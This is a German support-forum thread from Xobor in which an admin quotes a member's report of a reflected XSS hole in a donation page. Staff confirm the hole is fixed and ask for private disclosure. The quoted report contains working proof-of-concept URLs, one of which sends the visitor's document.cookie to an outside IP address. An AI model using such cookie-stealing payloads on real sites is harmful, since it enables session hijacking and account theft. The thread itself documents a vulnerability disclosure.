Bitte geben Sie einen Grund für die Verwarnung an
Der Grund erscheint unter dem Beitrag.Bei einer weiteren Verwarnung wird das Mitglied automatisch gesperrt.
[behoben] Gefahr durch reflected XSS Attack ?
@Johannes
@Ingmar
@Sami
Ich habe eine beunruhigende Nachricht eines Mitglieds bekommen in dem er schrieb er könne das Forum hacken.
Zitat:
Hallo Scannerxy,
Ich habe ein sogenannten reflected XSS Attack gefunden. Damit kann ich valides Javascript auf deiner Webseite ausführen und sogesehen alles mögliche anstellen.
Damit ist es auch möglich die Anmeldedaten von Usern zu klauen durch Cookie stealing.
Ich seh, dass du eine recht große Community aufgebaut hast und wollte dir das schnellstmöglich mitteilen.
Hier sind paar Beispiele, damit du das mal selber sehen kannst (ich schreibe nur Text auf die Seite und einfaches javascript)
1) payedabo_forum.php?donate=1&paykey=AP-8EL15736YC445134N&amount=%3Ch1%3EHALLO%20SCANNERXY%20:)%20Das%20ist%20ein%20simpler%20html%20reflected%20XSS%20Attack%20%3C/h1%3E
2) Einfaches Javascript (funktioniert nur im firefox angemeldet, da chrome einen xss auditor hat; den kann man aber umgehen wenn man sich etwas mühe gibt)
payedabo_forum.php?donate=1&paykey=AP-8EL15736YC445134N&amount=%3Cscript%3Edocument.location%3D%22http:%2F%2F109.73.52.223%2F%3Fck%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E
Zitat Ende.
Was ist davon zu halten? Droht dadurch tatsächlich Gefahr? Es wäre nett wenn ihr dazu Stellung nehmen würdet.
So etwas bitte in Zukunft immer direkt an forum@miranus.com melden.
Hinweise zu Sicherheitslücken gehören nicht in den öffentlichen Bereich, damit wir Zeit haben diese zu beheben.
Oben genannter Fehler wurde soeben behoben.
Ich habe in den Logs geschaut: Der Fehler wurde auch nicht ausgenutzt.
Joh. Voß
xobor.de · Miranus GmbH · Wir helfen gerne - Unterstützen Sie Xobor durch die Buchung eines Premium Tarifs.
#4 RE: Gefahr durch reflected XSS Attack ?
@Scannerxy
Danke für die Meldung. Da war ich wohl bei deinem Forum mit dem Report der Sicherheitslücke falsch.
@Johannes
Ich würde gerne wegen dem Fund Kontakt mit euch aufnehmen und habe euch per Kontaktformular angeschrieben.
Wollte Sicherstellen, ob diese ankam.
Hallo @Thomasx00f,
vielen Dank für deine Mühe. Ich kann bestätigen, dass die E-Mail bei uns ankam, unsere Technik wird es sich schnellstmöglich genauer ansehen.
Sami
Support · Xobor.de · Miranus GmbH · Wir helfen gerne - Unterstütze Xobor durch die Buchung eines Premium Tarifs.
- Informationen
- Aktuelle News
- Forum Tutorials - Tipps und Anleitungen
- SEO / Werbung fürs Forum
- Verwaltung
- Extras
- Design
- Plugin(system)
- Eure Fragen zu Tutorials
- Forum Support
- Fragen und Antworten
- Pluginsystem
- Plugins
- Templates & Sprachen
- Bugreport
- Verbesserungsvorschläge
- Sponsoren gesucht
- Das neue Xobor Business-Template
- News und Updates
- Bugreport
- Allgemeines Feedback
- Verbesserungsvorschläge
- Sonstiges
- Kaffeeklatsch
- Lob & Kritik
- Verbesserungsvorschläge
- Allgemeine Fragen
- Fehlermeldungen
- Verbesserungsvorschläge Responsive Design
- Bugreport Responsive Design
- Archiv - Alter Betatest
- Responsive Design - Verbesserungsvorschläge
- Responsive Design - Bugreport
- Fragen zum neuen Template
- Neue Administration Beta Test
- Bugreport Neue Administration
- Allgemeines Fragen & Feedback
- Verbesserungsvorschläge zur neuen Administration
- Shoutbox
Ähnliche Themen
Jetzt anmelden!
Jetzt registrieren!
© 2017 Xobor | Forum-Software